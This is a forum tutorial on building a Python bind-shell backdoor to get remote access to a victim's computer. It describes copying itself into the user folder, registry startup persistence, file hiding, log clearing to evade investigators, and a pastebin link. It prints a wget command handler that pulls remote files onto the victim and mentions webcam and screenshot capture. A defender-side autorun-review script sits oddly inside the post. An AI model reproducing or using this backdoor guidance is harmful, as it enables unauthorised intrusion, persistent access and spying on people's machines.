How to Create a Bind Shell in Python

Aug 19, 2015 08:11 PM
Aug 19, 2015 08:16 PM

Hi guys, I'm gonna keep this short because I've got assignments and a lot of notes to study, and also other how-tos and forums to read. lol... Since I'm keeping this short, no story time, just the scenario. And I want to thank n3stor for giving me the idea to post this.

Scenario

Let's say you have a target to hack and you want remote access to the victim (duh!). I think the most effective backdoor is the reverse shell because you get a connection no matter what! But what if someone finds it and reverse engineers it? You don't want them to know your IP address, and they will, even if you clear the logs. With a bind shell you have to connect yourself, it is less likely that you will get in, and it is loud, but if you clear the logs, reverse engineering of the backdoor can't get you. So cool, huh ;)

Step 1: Import Modules and Maintain Access

So first, you have to import the modules that the backdoor will use.

[Image: screenshot of the code for this step]

  • socket - for network connections
  • thread - so you can get multiple connections
  • subprocess - so you can run system commands

Now I am going to explain the subprocess calls. They assume you run it from a USB:

  • it copies the shell to the current user's directory
  • adds the bind shell to the registry so it always runs on system startup
  • hides the bind shell so it cannot be found easily
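From the defender's side, the three behaviours listed above leave a combination that is easy to check for. The following is an added example, not code from the original post: it reviews autorun entries and flags targets that sit inside a user profile, ranking hidden ones higher. It assumes the startup entry is a registry Run-key style command line, that "hidden" means the Windows hidden file attribute, and that profiles live under C:\Users; all entry names, paths and attribute values are constructed sample data.

```python
import ntpath
import re

FILE_ATTRIBUTE_HIDDEN = 0x2      # Windows "hidden" file attribute bit
PROFILE_ROOT = "c:\\users\\"     # assumption: default profile location

# Constructed sample data, shaped like an autoruns/inventory export.
SAMPLE_ENTRIES = [
    {"name": "VendorAgent", "command": r'"C:\Program Files\Vendor\agent.exe" /background'},
    {"name": "Updater", "command": r"C:\Users\alice\winupd.exe"},
    {"name": "Sync", "command": r'pythonw.exe "C:\Users\alice\AppData\Roaming\sync.pyw"'},
    {"name": "Helper", "command": r"C:\PROGRA~1\..\Users\alice\helper.exe -q"},
]
# Constructed attributes keyed by lower-cased path (0x20 = archive).
SAMPLE_ATTRS = {
    r"c:\users\alice\winupd.exe": 0x22,
    r"c:\users\alice\appdata\roaming\sync.pyw": 0x20,
    r"c:\users\alice\helper.exe": 0x02,
}


def paths_in(command):
    """Return normalised drive-rooted paths found in an autorun command line."""
    tokens = [q or b for q, b in re.findall(r'"([^"]+)"|(\S+)', command)]
    # normpath collapses ".." so a detour through another folder is not missed.
    # Limitation: unquoted paths containing spaces are split at the space.
    return [ntpath.normpath(t) for t in tokens if re.match(r"[A-Za-z]:\\", t)]


def review(entries, attributes):
    """Flag autorun targets inside a user profile; hidden ones rank 'high'."""
    findings = []
    for entry in entries:
        for path in paths_in(entry["command"]):
            key = path.lower()
            if not key.startswith(PROFILE_ROOT):
                continue
            hidden = attributes.get(key, 0) & FILE_ATTRIBUTE_HIDDEN
            findings.append((entry["name"], path, "high" if hidden else "review"))
    return findings


if __name__ == "__main__":
    for name, path, level in review(SAMPLE_ENTRIES, SAMPLE_ATTRS):
        print(f"{level:6} {name:8} {path}")
```

Per-user applications legitimately start from the profile, so "review" findings need an allowlist or a signature check before anyone acts on them.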

Step 2: Main Program

This is where the whole main code is.

[Image: screenshot of the code for this step]

This part contains what happens after you have got a connection.

Now we don't want just anyone to be using our backdoor, so I added authentication to it. Didn't have time to change the username, but feel free. And make sure you change it (don't want to be in trouble because of script kiddies... lol). And you can download more stuff with the wget there ;) ... lol. So anyway, that's pretty much it, nothing much to it.

Step 3: Persistence

This part of the code mainly makes sure that you will always be ready to receive a connection even if an error causes the socket to close.

[Image: screenshot of the code for this step]

It also creates a thread so that there can be more than one connection simultaneously (hope that makes sense!!). And obviously, there can only be a maximum of 5 connections. :D

Conclusion

So that is pretty much it. I added more functionality to the improved one I have, like download and upload of files from and to the victim's computer, webcam and screenshot. They are not too difficult, so I'm sure you can figure that out for yourself. Well, happy hacking folks. And don't forget to check out n3stor's tutorial on the reverse shell.

I have pasted the code on pastebin:

http://pastebin.com/GzZp6K7a

EDIT: Sorry for any typos or errors in my English. And also there is a mistake in the pastebin code post for the wget part of it.

    # Python 2 fragment: data is the received command, data[5:] is the text after "wget "
    elif data.strip('\r\n').startswith('wget'):
        try:
            f = open(os.path.basename(data[5:]), "wb")
            f.write(urllib2.urlopen(data[5:]).read())
            f.close()
            conn.send("Successfully downloaded %s" % os.path.basename(data[5:]))
        except:
            conn.send("Download failed!")

I forgot the .read() function. I'm sorry.
